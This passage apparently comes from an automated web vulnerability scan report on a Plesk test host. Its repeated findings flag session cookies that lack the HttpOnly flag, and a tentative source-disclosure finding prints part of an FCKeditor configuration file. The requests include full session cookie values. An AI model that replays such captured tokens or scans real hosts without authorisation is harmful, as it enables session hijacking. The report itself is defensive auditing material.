Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fhtop.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:48 GMT
Connection: close


3.28. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fspacer.gif%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:05:57 GMT
Connection: close


3.29. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_02.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:39 GMT
Connection: close


3.30. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_06.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:57 GMT
Connection: close


3.31. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_10.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:49 GMT
Connection: close


3.32. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_13.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:07 GMT
Connection: close


3.33. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_19.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:02 GMT
Connection: close


3.34. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_22.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:42 GMT
Connection: close


3.35. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_23.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:04 GMT
Connection: close


3.36. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fwysiwyg%2Fcustom%2Fskins%2Fdefault%2Fimages%2Ftoolbar.buttonarrow.gif
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:37 GMT
Connection: close


3.37. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.start.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /wysiwyg/custom/skins/default/images/toolbar.start.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wysiwyg/custom/skins/default/images/toolbar.start.gif HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fwysiwyg%2Fcustom%2Fskins%2Fdefault%2Fimages%2Ftoolbar.start.gif
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:37 GMT
Connection: close


4. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /wysiwyg/fckconfig.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /wysiwyg/fckconfig.js?5.0.0.2009110318 HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Nov 2008 10:35:32 GMT
Accept-Ranges: bytes
ETag: "0327163b244c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:13 GMT
Content-Length: 13745

.../*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2008 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Editor configuration settings.
*
* Follow this link for more information:
* http://wiki.fckeditor.net/Developer%27s_Guide/Configuration/Configurations_Settings
*/

FCK_IMAGES_PATH = FCKConfig.BasePath + '../editor/images/';
FCK_SPACER_PATH = FCK_IMAGES_PATH + 'spacer.gif';

FCKConfig.CustomConfigurationsPath = '' ;

FCKConfig.EditorAreaCSS = FCKConfig.BasePath + 'css/fck_editorarea.css' ;
FCKConfig.EditorAreaStyles = '' ;
FCKConfig.ToolbarComboPreviewCSS = '' ;

FCKConfig.DocType = '' ;

FCKConfig.BaseHref = '' ;

FCKConfig.FullPage = false ;

// The following option determines whether the "Show Blocks" feature is enabled or not at startup.
FCKConfig.StartupShowBlocks = false ;

FCKConfig.Debug = false ;
FCKConfig.AllowQueryStringDebug = true ;

FCKConfig.SkinPath = FCKConfig.BasePath + 'skins/default/' ;
FCKConfig.SkinEditorCSS = '' ;    // FCKConfig.SkinPath + "|<minified css>" ;
FCKConfig.SkinDialogCSS = '' ;    // FCKConfig.SkinPath + "|<minified css>" ;

FCKConfig.PreloadImages = [ FCKConfig.SkinPath + 'images/toolbar.start.gif', FCKConfig.SkinPath + 'images/toolbar.buttonarrow.gif' ] ;

FCKConfig.PluginsPath = FCKConfig.BasePath + 'plugins/' ;

// FCKConfig.Plugins.Add( 'autogrow' ) ;
// FCKConfig.Plugins.Add( 'dragresizetable' );
FCKConfig.AutoGrowMax = 400 ;

// FCKConfig.ProtectedSource.Add( /<%[\s\S]*?%>/g ) ;    // ASP style server side code <%...%>
// FCKConfig.ProtectedSource.Add( /<\?[\s\S]*?\?>/g ) ;    // PHP style server side code
// FCKConfig.ProtectedSource.Add( /(<asp:[^\>]+>[\s|\S]*?<\/asp:[^\>]+>)|(<asp:[^\>]+\/>)/gi ) ;    // ASP.Net style tags <asp:control>

FCKConfig.AutoDetectLanguage    = true ;
FCKConfig.DefaultLanguage        = 'en' ;
FCKConfig.ContentLangDirection    = 'ltr' ;

FCKConfig.ProcessHTMLEntities    = true ;
FCKConfig.IncludeLatinEntities    = true ;
FCKConfig.IncludeGreekEntities    = true ;

FCKConfig.ProcessNumericEntities = false ;

FCKConfig.AdditionalNumericEntities = '' ;        // Single Quote: "'"

FCKConfig.FillEmptyBlocks    = true ;

FCKConfig.FormatSource        = true ;
FCKConfig.FormatOutput        = true ;
FCKConfig.FormatIndentator    = ' ' ;

FCKConfig.StartupFocus    = false ;
FCKConfig.ForcePasteAsPlainText    = false ;
FCKConfig.AutoDetectPasteFromWord = true ;    // IE only.
FCKConfig.ShowDropDialog = true ;
FCKConfig.ForceSimpleAmpersand    = false ;
FCKConfig.TabSpaces        = 0 ;
FCKConfig.ShowBorders    = true ;
FCKConfig.SourcePopup    = false ;
FCKConfig.ToolbarStartExpanded    = true ;
FCKConfig.ToolbarCanCollapse    = true ;
FCKConfig.IgnoreEmptyParagraphValue = true ;
FCKConfig.PreserveSessionOnFileBrowser = false ;
FCKConfig.FloatingPanelsZIndex = 10000 ;
FCKConfig.HtmlEncodeOutput = false ;

FCKConfig.TemplateReplaceAll = true ;
FCKConfig.TemplateReplaceCheckbox = true ;

FCKConfig.ToolbarLocation = 'In' ;

FCKConfig.ToolbarSets["Default"] = [
   ['Source','DocProps','-','Save','NewPage','Preview','-','Templates'],
   ['Cut','Copy','Paste','PasteText','PasteWord','-','Print','SpellCheck'],
   ['Undo','Redo','-','Find','Replace','-','SelectAll','RemoveFormat'],
   ['Form','Checkbox','Radio','TextField','Textarea','Select','Button','ImageButton','HiddenField'],
   '/',
   ['Bold','Italic','Underline','StrikeThrough','-','Subscript','Superscript'],
   ['OrderedList','UnorderedList','-','Outdent','Indent','Blockquote'],
   ['JustifyLeft','JustifyCenter','JustifyRight','JustifyFull'],
   ['Link','Unlink','Anchor'],
   ['Image','Flash','Table','Rule','Smiley','SpecialChar','PageBreak'],
   '/',
   ['Style','FontFormat','FontName','FontSize'],
   ['TextColor','BGColor'],
   ['FitWindow','ShowBlocks','-','About']        // No comma for the last row.
] ;

FCKConfig.ToolbarSets["Basic"] = [
   ['Bold','Italic','-','OrderedList','UnorderedList','-','Link','Unlink','-','About']
] ;

FCKConfig.EnterMode = 'br' ;            // p | div | br
FCKConfig.ShiftEnterMode = 'p' ;    // p | div | br

FCKConfig.Keystrokes = [
   [ CTRL + 65 /*A*/, true ],
   [ CTRL + 67 /*C*/, true ],
   [ CTRL + 70 /*F*/, true ],
   [ CTRL + 83 /*S*/, true ],
   [ CTRL + 84 /*T*/, true ],
   [ CTRL + 88 /*X*/, true ],
